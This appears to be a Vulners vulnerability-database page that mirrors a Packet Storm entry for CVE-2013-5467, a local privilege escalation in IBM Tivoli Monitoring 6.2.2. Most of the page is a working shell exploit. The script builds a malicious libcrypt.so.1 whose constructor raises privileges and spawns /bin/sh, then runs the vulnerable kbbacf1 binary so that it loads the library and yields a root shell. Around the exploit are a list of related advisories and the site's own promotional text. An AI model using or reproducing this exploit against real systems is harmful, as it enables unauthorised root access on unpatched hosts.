Vulners
Lucene search
IBM Tivoli Monitoring 6.2.2 kbbacf1 Privilege Escalation
🗓️ 30 Oct 2014 00:00:00Reported by Robert JaroszukType 
packetstorm🔗 packetstormsecurity.com👁 54 Views
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | IBM Tivoli Monitoring 6.2.2 kbbacf1 - Privilege Escalation Exploit | 30 Oct 201400:00 | – | zdt |
 | CVE-2013-5467 | 29 Aug 201410:00 | – | cve |
 | CVE-2013-5467 | 29 Aug 201410:00 | – | cvelist |
 | Security Bulletin: Vulnerabilities in IBM Tivoli Composite Application Manager Agent for Sybase ASE with potential for privilege escalation (CVE-2013-5467) | 17 Jun 201815:43 | – | ibm |
| Security Bulletin: Vulnerabilities in IBM Tivoli Monitoring agent and shared library with potential for privilege escalation (CVE-2013-5467) | 17 Jun 201814:42 | – | ibm |
 | IBM Tivoli Monitoring 6.2.2 kbbacf1 - Local Privilege Escalation | 29 Oct 201400:00 | – | exploitdb |
 | EUVD-2013-5307 | 7 Oct 202500:30 | – | euvd |
 | IBM-Tivoli-Monitoring-6.2.2 | 4 Jan 201516:05 | – | exploitpack |
| IBM Tivoli Monitoring 6.2.2 kbbacf1 - Local Privilege Escalation | 29 Oct 201400:00 | – | exploitpack |
 | CVE-2013-5467 | 29 Aug 201409:55 | – | nvd |
10
`#!/bin/sh
# Title: IBM Tivoli Monitoring V6.2.2 kbbacf1 privilege escalation exploit
# CVE: CVE-2013-5467
# Vendor Homepage: http://www-03.ibm.com/software/products/pl/tivomoni
# Author: Robert Jaroszuk
# Tested on: RedHat 5, Centos 5
# Vulnerable version: IBM Tivoli Monitoring V6.2.2 (other versions not tested)
#
echo "[+] Tivoli pwner kbbacf1 privilege escalation exploit by Robert Jaroszuk"
echo "[+] Preparing the code..."
cat > kbbacf1-pwn.c << DONE
#define _GNU_SOURCE
#include <unistd.h>
#include <stdlib.h>
#include <dlfcn.h>
void __cxa_finalize (void *d) {
return;
}
void __attribute__((constructor)) init() {
setresuid(geteuid(), geteuid(), geteuid());
execl("/bin/sh", (char *)NULL, (char *)NULL);
}
DONE
cat > version << DONE
GLIBC_2.2.5 { };
GLIBC_2.3 { };
GLIBC_2.3.2 { };
GLIBC_PRIVATE { };
DONE
echo "[+] Preparing the code... part2"
/usr/bin/gcc -Wall -fPIC -shared -static-libgcc -Wl,--version-script=version -o libcrypt.so.1 kbbacf1-pwn.c
echo "[+] Cleaning up..."
/bin/rm -f kbbacf1-pwn.c version
echo "[+] Exploiting."
/opt/IBM/ITM/tmaitm6/lx8266/bin/kbbacf1
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Oct 2014 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.00379